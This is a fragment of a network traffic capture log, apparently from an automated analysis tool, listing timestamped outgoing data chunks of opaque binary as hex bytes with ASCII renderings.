                                                                                                                                                              2023-09-01 11:40:10 UTC97OUTData Raw: f4 6d ba 25 94 2d bf 80 50 88 a4 86 51 d4 e1 c6 4a 4e 38 fe 97 df 28 cf a3 9b 85 b1 91 e8 1c d8 04 e6 83 39 f4 7d d1 2d fa f3 b5 cc d4 3f 5d b5 75 23 bc 8d 94 8e cc 93 74 a1 5d 68 f4 c1 b4 18 10 bc 30 f6 cf 65 27 10 54 8b ac a1 87 c7 a1 fb 10 e8 79 e8 13 bc 55 31 d2 58 67 9b da 2d ee 40 2b 8d a5 bf 4e 4b df 8d db 3d 23 da 76 61 c1 0b 58 07 e1 95 1e 27 3a 6f e2 6c ba 31 6e b6 84 c3 d2 be fe 74 a9 d4 8d 73 af b8 df 0f 0c d2 05 af 02 a2 04 f0 91 f2 5b da fa 85 fc 43 b7 bc 95 d7 bd 40 f4 9e 5b ee 65 4e b7 94 11 13 3e 52 f7 7c 1d 47 ad f8 97 e5 4a 4e 42 e6 bf e0 16 eb e1 a1 67 b0 97 d8 a3 bf 15 31 7b 27 83 92 8d de 74 5f f9 0f cf e5 e4 6f fe 83 c4 77 76 c9 ff ac 8c dd 8e ba 99 d7 15 46 62 0c 34 74 1c 53 f6 de b7 5d 42 7c 32 6f e5 c7 fc 71 b6 bc 7d 6e 92 c0 98
                                                                                                                                                              Data Ascii: m%-PQJN8(9}-?]u#t]h0e'TyU1Xg-@+NK=#vaX':ol1nts[C@[eN>R|GJNBg1{'t_owvFb4tS]B|2oq}n
                                                                                                                                                              2023-09-01 11:40:10 UTC113OUTData Raw: 10 05 e2 e6 36 5a e7 9c 74 46 fc d1 83 df ca cd 4c 62 b6 29 62 f3 a5 57 f4 6e f6 44 1e 43 db 29 24 f7 df f2 65 cd 24 86 1f 35 c1 5b 5d 2b d0 de 7b b1 57 65 f8 b9 9b f7 0b 5f fb f3 be cb 86 ca 84 f8 55 c1 e1 e9 44 a0 f3 08 96 16 ab e9 96 bc 3c 81 cf f3 bc d4 a9 d9 fa b0 6f 42 d9 dc 40 a9 f9 7a 49 d8 08 7a 71 8b f1 b2 1e 69 7c b0 4f 63 f4 f3 ab 9d 90 52 40 c7 4e 41 96 e2 4f 4e 03 e4 06 59 5b 8b ac c9 f2 0b 93 d9 17 26 8b 94 20 18 cf ab be c4 a1 fc 3f 72 1b 3e 27 3e c4 89 cc 1c c6 28 92 41 d6 8d 06 dc 94 e3 00 47 67 19 bd 15 41 3d cf f4 70 98 fa da e1 7d f0 d0 c4 12 2f 77 44 28 28 44 6f 54 30 80 1e b2 eb 75 28 6a dd fc 4a c5 93 97 3f e5 50 7b 8c 72 b7 b9 c0 bd e2 0a af 45 28 68 c4 23 52 24 d8 76 ae 6d f5 4d 4b 15 af fb 46 26 db 4e b1 1c f7 70 a1 d1 47 4e af
                                                                                                                                                              Data Ascii: 6ZtFLb)bWnDC)$e$5[]+{We_UD<oB@zIzqi|OcR@NAONY[& ?r>'>(AGgA=p}/wD((DoT0u(jJ?P{rE(h#R$vmMKF&NpGN
                                                                                                                                                              2023-09-01 11:40:10 UTC129OUTData Raw: 5b e9 49 6d 2e c6 6f c9 b5 fd d9 f6 61 f9 5a ad fc 58 a6 49 c3 cb bb 84 1a 5c 63 1f ef 77 e0 dd 34 e7 be 09 1a 6c ce fc 93 a1 69 b0 75 ff 6f ac 29 3f 37 27 bd 6a 4e 78 59 dc 03 7f 20 4f 0a f8 cb 1a 75 06 eb 1a 72 0e e1 47 04 7c 92 64 ec 14 34 2b 18 ff 87 ed b3 de 48 87 8f c1 95 78 71 b0 fb 32 fc 70 86 f3 6d fc df 41 86 82 71 48 52 bb 19 f6 c4 3e 3e 5d 99 2a 57 8f 0c b7 b1 4b 82 f5 f6 28 01 91 de ef 27 cb 73 0e ab dd 9d dc b0 cd 1f 64 92 b3 32 5b f2 5e b8 d9 96 83 bd 20 ba e4 ba b4 c1 3b e1 26 ed 54 1b b0 d6 9f 5c bf 75 c0 6f e4 b9 c1 7e aa 25 bd 9a 2a 87 e0 d7 69 06 bc 37 71 d5 ff 1e 98 31 ff eb 3f 68 13 f9 71 6a 68 99 71 8d e9 eb 5b af 82 aa 12 a4 29 38 1c 34 3c 89 e6 27 79 e1 79 c2 ee d9 3c 6c 56 44 16 a1 8b d6 50 87 ba c3 9c 68 70 03 96 ae 11 b4 07 ed
                                                                                                                                                              Data Ascii: [Im.oaZXI\cw4liuo)?7'jNxY OurG|d4+Hxq2pmAqHR>>]*WK('sd2[^ ;&T\uo~%*i7q1?hqjhq[)84<'yy<lVDPhp
                                                                                                                                                              2023-09-01 11:40:10 UTC145OUTData Raw: 37 3f 5d 7e cb 33 15 b5 9f a9 b8 ed e9 8a 46 cf 27 1a 3e 97 68 f4 6c 02 7e 7e 83 a7 13 f5 9e ac ac fb 44 c5 2d 4f 56 7e ef f1 ca ef 3c 5a fe ef 67 4a bf 7d a2 f8 9f 8e 5c fe c6 81 4b 37 ee fd 38 56 78 2e b2 e7 82 51 f0 91 b1 ed 23 33 f7 fd e8 ea f7 a2 8b de b6 66 fe c9 b8 ef 37 62 dc 2b e2 8e 67 8d 91 4f 5a 39 8f 46 73 1e 8e 0e 3b 6b e2 87 f0 51 4c 0b 1a 82 8d fa 70 5a 67 bf 5d 46 da 16 2b 35 37 06 ff e9 57 53 80 bf 3f 37 f5 b6 82 5e 80 72 e0 db 0a 70 cf 8b 9d ea a2 fd 12 1f ac 5c c4 46 d7 63 c5 f9 7a 33 3e 92 cc fc c8 d9 f6 63 7f 75 a4 1d 04 ae 78 63 3d b9 ee 4d f1 67 91 72 e0 b9 9b e8 e6 8f d5 ce 43 eb 1b 7e 29 c0 d5 e6 aa 04 58 45 7a 75 fb bd 1a 01 46 ad ad f7 59 12 e0 e4 f6 5b 43 01 4e ae be 86 3e 68 c7 df 19 4b af 20 0d 24 58 80 b5 41 4a 61 4d 95 ae
                                                                                                                                                              Data Ascii: 7?]~3F'>hl~~D-OV~<ZgJ}\K78Vx.Q#3f7b+gOZ9Fs;kQLpZg]F+57WS?7^rp\Fcz3>cuxc=MgrC~)XEzuFY[CN>hK $XAJaM
                                                                                                                                                              2023-09-01 11:40:10 UTC161OUTData Raw: 0b 98 ab c1 61 a2 b0 4c a1 59 e2 48 b0 b8 22 18 b7 04 1b 75 60 96 83 25 2a ae 1d 63 1f d2 3f 4b 50 5f dc 0f 6c a7 2c f3 c0 1c f2 46 c9 21 d2 7a 8c 56 d8 34 69 21 31 4b 3c 4d 3b 84 4d 0b 84 7b 59 d6 26 c9 d8 0b cd 72 a1 61 43 92 68 c2 ef 0d 92 ca 0f d1 96 df 0e 35 6a c2 4c 7a 49 05 7e 5a 90 b0 08 2c 80 d1 c7 da 86 e1 91 b8 e1 d6 48 90 c6 35 3f 6c 9d 12 2e fb e1 b9 50 c2 1a 5b 6d d5 f0 14 63 4e 58 33 37 51 d8 50 83 e5 1a 71 40 75 b0 32 b9 d6 22 a9 76 3c 00 9d d2 1a 75 96 68 e5 44 4d a5 1a 26 f2 12 22 2c ce d9 a4 55 54 f4 89 e2 74 28 c2 b4 d1 c2 60 98 ea 18 05 0d 28 1a 1f 24 5d b3 94 6e 47 94 1e 47 5d d1 c7 dc 3d 8f 43 79 27 fa b4 bb 27 0b d9 ea 73 de db f7 42 44 ff f3 40 bf 8b 28 c6 5e 7a 3d e0 02 25 72 e0 45 4a 44 ff b3 51 fd cf 50 22 fb e5 50 3c fd 4e 62
                                                                                                                                                              Data Ascii: aLYH"u`%*c?KP_l,F!zV4i!1K<M;M{Y&raCh5jLzI~Z,H5?l.P[mcNX37QPq@u2"v<uhDM&",UTt(`($]nGG]=Cy''sBD@(^z=%rEJDQP"P<Nb
                                                                                                                                                              2023-09-01 11:40:10 UTC177OUTData Raw: 48 ab f7 93 da 1e a1 1a 3f 94 2e 33 d6 2d e9 22 c5 9d a4 b4 5b 2f ed d1 4b fd 40 bc 45 3d 4c 7a a1 9f c9 28 0a 78 0b 03 d8 f0 42 0a 82 a4 28 c4 a4 15 87 f5 92 88 14 bb 89 52 77 42 25 33 da a4 12 80 cb 10 6e 53 6c 55 a9 e2 90 90 44 62 84 de a2 08 f0 27 6a 40 00 0c 3f 17 33 9f 61 c5 c0 aa f4 00 2c 7e 4a ea f3 61 3b 8b 4d fa 1d 08 00 cb b9 c1 b8 61 31 30 75 4a d8 bf 7c 0c 52 43 04 1a a7 1b 62 a4 3e ae 55 c5 8c 8a 28 fb 2f ef e8 ba f6 ff 79 39 34 b9 9b fe e5 1f d1 b3 f2 5e f5 de f2 34 f9 f3 cb 44 cc fb 55 06 20 69 a6 90 5d 25 12 6b 67 fc 90 29 ad 33 9c 8e 90 d5 79 c2 e6 7d f0 a1 dc f4 e3 43 55 ff 08 6d ce f8 35 27 fd 7e 2c da 14 7b 7e 26 51 53 ff ea ff a2 f8 4d 0b 74 f5 af fe dc 89 bb 03 ef 07 fe 24 90 ec e2 fd e2 b8 23 73 ee 11 94 3d ff 2f 13 f9 9a 25 dc c3
                                                                                                                                                              Data Ascii: H?.3-"[/K@E=Lz(xB(RwB%3nSlUDb'j@?3a,~Ja;Ma10uJ|RCb>U(/y94^4DU i]%kg)3y}CUm5'~,{~&QSMt$#s=/%
                                                                                                                                                              2023-09-01 11:40:10 UTC193OUTData Raw: bf 25 c0 cc 1e 48 07 34 63 0e c7 04 42 a5 b8 5c 11 e5 06 5b 04 a8 4a 4e e8 16 33 3b e0 b3 de f0 4f 56 f0 0e d0 e1 87 e4 04 28 46 52 2a 16 b0 0d 0e 38 35 bc f5 8b 32 66 3b 01 67 92 82 13 bd 1e 0c a6 00 82 0b 93 eb 75 ae dc 2f c5 03 b6 ff 16 7f 47 10 3e 3a 02 a0 e6 da 0d 16 29 93 ca 22 8f ab 77 04 bf f9 d7 bb 37 f0 9f 30 7b 9b 39 de fd 14 28 b8 b2 7e 8b b3 1b 6b f0 a1 03 ea 81 03 47 7e a6 82 21 01 12 27 af 69 6b ed a8 b3 d1 37 8c d9 5a 21 0d da dd d6 f0 ff 7e 28 fc d9 cc 8d df 28 32 11 36 ff 2e 9f fd ae 89 d1 5a 4b 23 e3 4b 6a 07 0d bb 4a 02 8b aa 42 18 ef 49 e0 76 d0 9b 73 a6 84 a8 70 50 a4 59 d7 5a 5e 33 f3 2f 1e e2 92 8a 57 ab fa 10 93 f7 e6 2f 5e 94 c4 fc 77 d7 5e 42 72 d7 f7 bb 99 31 a6 29 81 e0 7d 22 cd d5 2b f1 3d 7d 11 67 30 ed 23 9a b8 3d 13 6d 55
                                                                                                                                                              Data Ascii: %H4cB\[JN3;OV(FR*852f;gu/G>:)"w70{9(~kG~!'ik7Z!~((26.ZK#KjJBIvspPYZ^3/W/^w^Br1)}"+=}g0#=mU
                                                                                                                                                              2023-09-01 11:40:10 UTC209OUTData Raw: a3 e4 3f ff e2 02 1c c0 7e 3b e1 17 14 e0 ff e9 16 e8 73 11 e0 40 0e dc 0d 01 56 1c f8 bf ba 05 fa 9d ff 8d 16 e8 ae 0b b0 5e 7d cf 9b 00 2b 0e 9c 1e 40 80 1f 0b 52 07 d6 1a a1 f5 0e fc 34 75 60 a8 03 7b 04 58 2b 05 eb 05 38 80 03 97 70 f3 14 ef d5 17 84 19 9d 03 7b 25 45 2b ea 5b 4e a8 a2 0e 4c da a1 6b a8 00 6b d1 d0 81 05 58 97 0b 1d b0 14 ac cc 00 fb c1 be 71 08 13 68 45 f0 d7 0a 58 80 df f2 38 30 f3 ce b7 80 bf 06 eb 05 d8 4b 83 8f 29 f8 0f 06 07 14 60 7f 13 fe a0 b3 35 c2 fe 1a 1c 70 7f 92 46 67 02 0c 0e ec 29 02 fb 0a b0 06 79 ab a4 77 60 36 de ad 38 70 22 d6 60 49 73 60 45 7d a9 fd 6a e0 9b ea e6 24 2d 34 cb b7 53 7a b5 e8 49 99 f6 4c 17 8b 14 fc 59 9a 0c ab 0a 0d 27 d4 8d 75 27 ed a6 26 e3 c4 b2 a2 c1 0a 7e db 71 3c 48 6c ba c0 64 b8 99 0c 41 87
                                                                                                                                                              Data Ascii: ?~;s@V^}+@R4u`{X+8p{%E+[NLkkXqhEX80K)`5pFg)yw`68p"`Is`E}j$-4SzILY'u'&~q<HldA
                                                                                                                                                              2023-09-01 11:40:10 UTC225OUTData Raw: 56 11 80 7d f5 de a6 c1 68 1f 64 bb 35 af 90 71 e1 60 09 1c 22 b9 d2 23 0a ec 61 4e 76 a8 82 c4 3c 9f 86 36 34 fd 4d b7 89 32 06 8d de c0 e5 c9 ef 68 9d 09 e1 2f 53 00 76 0b b9 50 23 b6 8f 3a 30 a3 a0 83 5c 79 02 4d d0 c3 9a e1 13 9f 6a 1b 37 c5 97 e0 17 b7 01 4a 57 31 c8 47 a0 25 6e c2 3c 62 44 8a e2 20 45 2c 56 08 4a 51 7a 16 5d 2c 08 75 3a 40 a2 ef d1 39 0f 04 77 e6 49 ec fe 81 b2 f6 7a 7a ad 08 d0 59 c1 7e b2 10 00 6c 1e f2 dd 51 f3 8f 22 67 c0 3a 20 b0 78 05 df 10 50 e9 d9 b7 4e 8f 40 2c 63 0a f5 c1 0b 37 90 9a 24 99 bb 5b d7 ee 8c c7 22 5b 28 c9 53 66 2c 76 e9 02 3d e5 73 8c 13 24 8e 3e 04 dd 59 6d a1 1e a0 0f 47 fc 3f e0 53 16 20 b1 64 8d 0e 61 29 3a 4d db bd 18 80 17 e5 22 93 94 05 d4 a1 45 a1 db 38 60 db 60 95 66 69 59 93 c1 e7 e0 5e 00 29 66 d4
                                                                                                                                                              Data Ascii: V}hd5q`"#aNv<64M2h/SvP#:0\yMj7JW1G%n<bD E,VJQz],u:@9wIzzY~lQ"g: xPN@,c7$["[(Sf,v=s$>YmG?S da):M"E8``fiY^)f
                                                                                                                                                              2023-09-01 11:40:10 UTC241OUTData Raw: 36 1b 6c 9b 78 b0 2e d8 08 ac 4b 7b 28 88 6e 6f 99 fa fa 21 83 c2 ca 2a 27 d8 2b c7 59 a3 23 b8 32 3c c3 f9 98 af f6 86 c2 a8 5d b5 fc df ba 9e 66 d6 9f ba 1f a8 f6 9f 1b ef 8d 96 0c 9d bd 9d 6b fd bd 66 5e b6 ee fd f3 8e 09 f0 57 09 b8 1d 4c ef 26 ef 58 4d 19 fa c6 89 ee f3 dc 9b 55 dc 28 63 e3 cd cf 50 b5 33 d5 e6 ad a3 d6 c7 34 a7 15 52 b5 fe a1 3c ff 6b 2b c4 a2 b9 87 f8 bd 2d 6f 72 84 ef de ab 7e c7 31 d7 6c 17 f2 1f 55 32 1d d1 1a 1f 64 fb 32 c7 13 d8 ea 91 a0 76 7d f6 bd c7 cc a9 2b 40 ab da ee aa 70 c0 2a d2 d7 75 77 e1 bb d1 68 50 32 65 6b a0 cf 4e 65 a4 64 d1 fa 8f ff 87 c9 a0 07 61 bf 0b be 86 37 e1 80 0b a1 9a f7 b9 aa 7b 47 d6 c6 4e e6 c1 41 e6 b2 3f c7 e4 a5 59 c4 e1 21 0b 1f d5 3d 9f 45 67 c2 9e 74 06 3e 0e bb c2 55 26 31 c0 cd 46 7f 62 06
                                                                                                                                                              Data Ascii: 6lx.K{(no!*'+Y#2<]fkf^WL&XMU(cP34R<k+-or~1lU2d2v}+@p*uwhP2ekNeda7{GNA?Y!=Egt>U&1Fb
                                                                                                                                                              2023-09-01 11:40:10 UTC257OUTData Raw: 9b b1 b1 b2 7f 48 90 12 fe 09 11 74 2e 91 70 98 3e be f5 e8 c9 b8 76 c6 e1 d9 f2 07 84 96 4b 57 f4 9f 5a 83 71 5b b2 de 96 e8 d3 7f 39 ae b0 42 f8 18 4d 88 3f 14 1c 5a 1f ff e3 e9 4d 8a 91 09 30 fa 35 d2 1c 37 6e f8 a1 71 f0 7c f8 c1 5f 7b 80 f9 6a 27 81 18 47 e4 ef c6 a9 4c 8c 23 ac 7e 91 93 a4 84 fd 35 35 c1 97 33 af c2 83 00 64 1f ce 84 78 ca bf 3b ba 31 54 71 20 f9 3f 70 2a 5d 9e d7 01 e8 c8 04 6a ef ab 2f 95 3b d3 80 e6 f0 19 69 00 c1 18 50 05 91 fa 2b a1 7a 26 04 41 c9 2f ab a2 ef 20 0f 77 8a 21 c0 86 59 02 3e da 01 87 05 92 c9 4a 08 76 22 19 40 d8 6b d3 d3 e8 5c 66 ea d7 4d e6 90 92 14 c0 91 81 d6 9b 28 d9 dc 11 aa a9 d0 7a b2 22 f5 ac f9 ed ee 41 8e 70 ee 36 7e e5 aa 8f 62 25 ea 24 09 a2 71 28 f3 ee 43 f0 e7 e5 bf 9f 8d e0 55 a4 64 fb ea fe 82 5f
                                                                                                                                                              Data Ascii: Ht.p>vKWZq[9BM?ZM057nq|_{j'GL#~553dx;1Tq ?p*]j/;iP+z&A/ w!Y>Jv"@k\fM(z"Ap6~b%$q(CUd_
                                                                                                                                                              2023-09-01 11:40:10 UTC273OUTData Raw: 1d 4e 38 3f d5 a3 45 27 68 51 df 37 eb c9 aa a5 59 07 05 22 36 57 58 6f 9e cc fe 99 d6 4f 15 35 f0 3f 55 a6 15 44 39 fa 93 25 13 ea 0a 8a f3 3b c3 1d 7c f4 72 95 ed 06 93 d3 d8 b3 52 ed bd fe 74 c3 12 7b 13 e7 a2 5a 53 0c 42 9a 7c 2c b9 b8 f5 ac 00 79 f6 cb 59 c3 48 57 2e 6e 4f b4 24 b6 9a d3 0d 7a fc ba 65 81 e5 e6 b0 fc 5d 2d da 47 c6 7f 1b d7 68 de fc e4 f9 8d d1 f9 6d e9 60 bd 24 5d e1 d4 73 e1 5a 37 84 ff e2 48 6f 44 c7 ee ef ae b8 dd 5f 7f 43 fc 3e e8 36 42 35 4e e7 3f 2b 6a 72 c4 78 43 2d 87 98 de 71 b1 fc d4 d8 42 5d cc a7 a4 8b 36 3f ff c6 8c f4 3b 0d 80 59 6f 83 be 85 68 36 2c ed 54 8f 2f 59 33 ac 3f 97 1e b2 73 5e 6a 17 de 7f 29 04 3a 66 50 ec 57 e0 49 c3 d9 53 c8 73 b4 23 9d bf 0a 45 e4 de 54 8e a1 28 e4 bd 93 02 e7 ac e7 b6 37 c5 57 87 95 1a
                                                                                                                                                              Data Ascii: N8?E'hQ7Y"6WXoO5?UD9%;|rRt{ZSB|,yYHW.nO$ze]-Ghm`$]sZ7HoD_C>6B5N?+jrxC-qB]6?;Yoh6,T/Y3?s^j):fPWISs#ET(7W
                                                                                                                                                              2023-09-01 11:40:10 UTC289OUTData Raw: 6d 64 93 32 e8 d3 47 b2 02 d0 f3 64 f0 1b d9 96 7f 74 0b 22 29 38 5a c4 75 a4 3b 74 2a 3d bc fc e9 f9 83 2c 9b fd 00 8e f1 23 04 3f 61 db 97 aa 6e a0 e5 04 7c d2 b8 4a 01 9c 99 1c 95 06 a1 33 1a a1 80 da d7 27 68 6e b5 81 a1 94 0c 0d ec b7 a3 2b c3 e3 81 17 67 6f 37 12 28 0c 8b 6e 7f e3 43 6a 66 5a a1 b8 17 23 b6 80 e2 45 aa 62 9b 63 22 bd 80 88 63 ae 4e 05 b8 7c d7 98 6e bb 6b 26 d4 89 a7 87 ef 45 f6 cb 4f dd c8 c0 59 da e1 70 c0 16 97 08 bc 54 28 82 4e a4 e0 d1 62 91 da 9e 1d 8e 90 c2 4a 67 06 42 5d b9 f7 76 a1 96 45 7e 94 42 e7 d3 c8 c9 f3 38 69 d0 51 06 55 46 06 4f 27 91 1b dd cf 94 ee e6 70 23 13 d1 0e e4 a6 8a 69 f7 ef 0d f8 36 34 ce 32 25 bc be fb 47 da 81 a9 c7 ba 66 33 86 d2 c3 05 15 94 ef 5f f2 de 48 47 e1 16 28 0f 40 81 ff c5 4b 05 97 fc 98 c3
                                                                                                                                                              Data Ascii: md2Gdt")8Zu;t*=,#?an|J3'hn+go7(nCjfZ#Ebc"cN|nk&EOYpT(NbJgB]vE~B8iQUFO'p#i642%Gf3_HG(@K
                                                                                                                                                              2023-09-01 11:40:10 UTC305OUTData Raw: b0 dc 02 7b 12 68 50 da fe b8 26 65 9d 7c 09 55 87 2d 39 6e 84 ec 69 c9 29 52 44 b2 4a 86 88 34 27 e5 b0 74 6a 7b 45 a0 ab 84 15 6e 62 3b bc d0 34 55 94 1a 2c 88 15 ab 5e 0c 66 1c af 92 e2 b7 e2 d5 49 66 36 65 19 7f 78 99 35 24 7f 52 74 4a 05 41 eb 1f 3a b9 50 e1 15 4c 44 16 8b b2 fe dc cd ce ba a7 42 ba ad 22 39 91 e2 4f 6a 51 ae 63 5f 4f ac 40 35 e5 85 9a 3b 38 75 62 db 1a 61 5d 4b 88 f4 04 4a 1e a1 63 cd 32 7d 9d eb 9c bc 98 c4 af c0 52 a2 49 34 b5 13 46 79 61 97 f2 12 7e 98 32 13 c1 91 78 a8 8f bc 50 db 4e 31 e5 eb 9d 29 0f 96 d9 db a1 6c 9e aa 79 7b 74 e0 44 e8 75 04 eb bc 98 a1 13 9f 67 fd 75 d6 ab 2f ea 72 5d 31 5c 52 d7 d2 78 e1 17 2b 1e d5 79 b1 84 86 71 2e f9 92 f0 aa fb dd d7 c7 6e 10 01 45 2f d4 54 fe fa 93 f1 0d bf 42 e2 02 85 56 28 d5 58 48
                                                                                                                                                              Data Ascii: {hP&e|U-9ni)RDJ4'tj{Enb;4U,^fIf6ex5$RtJA:PLDB"9OjQc_O@5;8uba]KJc2}RI4Fya~2xPN1)ly{tDugu/r]1\Rx+yq.nE/TBV(XH
                                                                                                                                                              2023-09-01 11:40:10 UTC321OUTData Raw: 07 1f 38 49 12 83 12 49 70 22 7e 84 e1 cf ab ee 25 df 74 40 f4 49 13 bc 93 e9 e4 b6 04 93 57 82 c9 33 5e f4 8c 13 3c 96 22 ee 71 a2 47 3c e2 19 87 b8 2f 15 3a 2f 22 20 c0 9d e6 a1 03 bb cd 15 3b cc 06 a4 76 b3 84 f6 b3 20 22 ed 67 00 b2 ca 4e 63 60 43 be 8e 58 16 05 97 69 0c ed b3 12 6d e9 17 59 93 bf 73 8c d4 26 06 a2 86 49 ca 5c 00 a6 c4 fc c3 af 76 93 c4 f6 93 35 b9 59 aa b8 ed 26 52 b9 9d 88 85 21 78 ad 30 81 5d c0 ab 14 e8 4b 26 51 a1 9d 8c 9f 9d b9 51 3a 4c 51 69 4f 0b 4c 78 8d c9 44 1e db 4e 94 23 55 5f 1e c7 a9 29 5f d7 d1 18 db 46 13 d7 b1 2a d4 57 e9 2e 77 8e 2c c0 f4 da 2a 4a d4 69 75 9d 23 d4 6f 89 96 d6 ea 9c 05 d2 62 84 9e 61 08 98 6a 2b d9 84 e5 5c 31 cf 18 63 0a 7a 24 8b 62 eb 28 b1 35 8b 51 f8 55 5a 8e 51 3f bb 6c 39 56 6a 39 46 6a 1e 6d
                                                                                                                                                              Data Ascii: 8IIp"~%t@IW3^<"qG</:/" ;v "gNc`CXimYs&I\v5Y&R!x0]K&QQ:LQiOLxDN#U_)_F*W.w,*Jiu#obaj+\1cz$b(5QUZQ?l9Vj9Fjm
                                                                                                                                                              2023-09-01 11:40:10 UTC337OUTData Raw: e0 45 27 65 c8 25 c7 e0 8b f6 c1 44 86 41 89 69 ae 78 e4 65 27 96 e1 2b c4 84 35 19 86 88 7d 38 c1 0e 4c 48 20 32 8c 35 d8 01 26 0c 0e 3c 35 b1 68 e6 55 27 38 f0 9c ab 2e 9c 0a 4e 66 2c 00 01 4e 61 8a cb 2d d7 e4 c0 a6 b7 56 a4 02 8e 95 69 4e 0a 78 ef ea 34 d7 97 37 dd eb 32 d0 ba 0c 37 e3 a6 0b 58 9f ee de 90 e1 09 d1 00 ef 05 36 67 b8 b7 67 a2 1d 59 98 9d 59 6e 60 77 96 0b d8 73 db bd ef b6 13 e2 ae 4c f7 de 4c cf 81 5b ae c3 59 ae a3 59 ce 23 b7 9d 07 6e 3b 76 67 3b 43 b2 9c 8b 52 72 d7 dc 45 ed b7 27 bc da 7e be d2 08 fe 75 62 36 9e 6b c8 86 c4 6a 43 83 09 e5 c4 25 43 b8 d7 94 c2 16 ba 94 13 07 0e 0b e9 df d5 2c fd 7b 67 39 8e f7 43 be 89 ee 41 db 80 a9 00 e7 5c 19 90 9b c0 06 41 8b 02 ec 4c a5 02 3c 81 08 f0 14 ff eb 52 e8 59 fd 53 10 60 fb 73 35 40
                                                                                                                                                              Data Ascii: E'e%DAixe'+5}8LH 25&<5hU'8.Nf,Na-ViNx4727X6ggYYn`wsLL[YY#n;vg;CRrE'~ub6kjC%C,{g9CA\AL<RYS`s5@
                                                                                                                                                              2023-09-01 11:40:10 UTC353OUTData Raw: 9d be 77 03 a4 e1 c9 ab be 08 7e 29 cb 2a 09 22 a2 5d 22 b2 8e b4 b6 96 d0 86 cf ee 0d a1 03 fc 65 af de bc c0 fe 0d 62 b1 90 93 24 fe 65 42 d9 1f 8f 78 76 26 1a be 62 62 6c cc 2e 4a 9f 9f 05 f1 dc bc c1 64 b1 dc 40 d3 23 23 95 96 fc 26 c1 40 e1 ed 15 93 ab 75 f2 a3 94 0f d7 d2 35 43 54 7f fc 74 d5 0d d9 a3 34 3d 68 d0 28 2b 43 5b 8c b5 77 7d 30 9d 3a 87 fb d1 8c da fb a3 50 78 6c 38 f2 11 90 e7 70 45 64 a1 e7 1b c2 56 c3 38 8c 25 77 f9 45 84 c7 74 6d a5 66 86 64 6e 7f bb fe 36 2e 0c f7 ef 1c 10 87 af f4 ff 3e fd 82 17 d9 94 53 14 78 0a cd 7b ff 08 28 32 d7 a3 b3 55 5b ba e9 01 df f2 e7 d2 2f 7a a2 bf f8 64 07 ff fe a5 55 1d bb dd d7 eb e7 ef 3a 4c f0 88 b9 48 13 0b ed f5 47 2e 4a 33 5a f1 bb 47 7d f3 b8 57 1e c6 a8 60 30 c2 2d 74 66 78 aa 6a 08 04 3a 46
                                                                                                                                                              Data Ascii: w~)*"]"eb$eBxv&bbl.Jd@##&@u5CTt4=h(+C[w}0:Pxl8pEdV8%wEtmfdn6.>Sx{(2U[/zdU:LHG.J3ZG}W`0-tfxj:F
                                                                                                                                                              2023-09-01 11:40:10 UTC369OUTData Raw: 98 f8 f3 f8 e8 cb 6c 4f d4 1d ef c4 7f 66 b5 42 1b cb f1 9b de 0e f3 fd 4b b2 de 0d 8a 62 a2 92 81 17 3d 53 ef 56 1e 69 4d ef 9e 9c 2a 3e 1f 8f ec e7 ec 60 87 56 b4 ad d8 9e f5 8a 06 cb 86 ec 07 af c5 a8 f6 f4 16 47 86 ac 96 f5 0c 2b 27 b0 b6 6c 44 5f 93 fe e9 2f b2 56 61 83 0f 64 bb 03 f2 39 f6 80 6c 07 2f 90 d1 18 fe c8 cf f6 f0 7d 07 20 a0 0a 1a 7e 2c 1a a2 ca 65 ff 68 32 60 d9 dd 12 5c f2 f9 34 8b d0 aa bb 0a bd bb ce 19 2f 1b 84 b9 54 ac ee 5f 4b fc fe 04 82 7c 6d 27 81 2d aa 96 9e 04 3b f8 ff dd a5 5f 87 42 4a c4 b1 54 cb 86 c4 19 0b 96 2e 40 7e 90 f4 4b 13 41 f7 19 72 d2 e1 72 75 06 42 c1 b4 95 0a 19 e4 41 e7 37 35 2f 36 98 74 09 8d 35 cb 13 0d 62 21 c1 16 d1 7d 40 24 f3 df 61 12 c6 5d 73 ee 0d f0 9a cb da 9a dc e3 17 bd 56 90 c6 ff 1c b0 8b 57 0b
                                                                                                                                                              Data Ascii: lOfBKb=SViM*>`VG+'lD_/Vad9l/} ~,eh2`\4/T_K|m'-;_BJT.@~KArruBA75/6t5b!}@$a]sVW
                                                                                                                                                              2023-09-01 11:40:10 UTC385OUTData Raw: d7 c4 e3 42 dc 23 4a 5a 0f 32 20 3f 16 2d 51 44 7c f9 69 f6 15 16 c4 9d e4 2e bd ff eb 75 6a 6e b6 bb c2 dd 43 b0 25 33 70 15 39 62 02 ba b5 f8 8f cc 62 63 bf 42 04 3b 77 9c 36 9d 11 4b 80 f7 cb fa e5 c3 23 fa 1b a4 f1 7d 7b 17 66 95 5d 2f 76 9a b9 cf ab ad f1 3a cc e3 c8 03 28 17 14 ad 13 66 12 f4 de 42 ae 00 a6 cf 17 27 df fc 02 e2 7e a3 91 c1 34 e2 fa c5 63 c0 d9 22 f8 fb 9d 40 46 6f 19 78 4c f3 11 97 14 7c 22 d0 f1 e3 e4 a1 c8 34 da 28 67 80 94 40 dc e3 b6 f6 58 c0 fb 9f 88 00 24 af d0 92 b0 08 b2 4f f5 f1 fe c8 62 be 25 0d e2 2e 66 bd 07 d5 1e c3 0d 53 10 79 64 69 a6 01 98 bb 85 b8 0e 73 ca 9b 30 17 42 c8 37 ff 37 00 b9 75 91 1b 98 ab ac 94 b0 23 c5 ff 7c 9c 10 cc 06 91 4b 45 34 de 7e a6 b8 83 56 fe 00 43 ef f6 9c 93 a5 fe 12 ae 81 a2 ef d1 03 e9 34
                                                                                                                                                              Data Ascii: B#JZ2 ?-QD|i.ujnC%3p9bbcB;w6K#}{f]/v:(fB'~4c"@FoxL|"4(g@X$Ob%.fSydis0B77u#|KE4~VC4
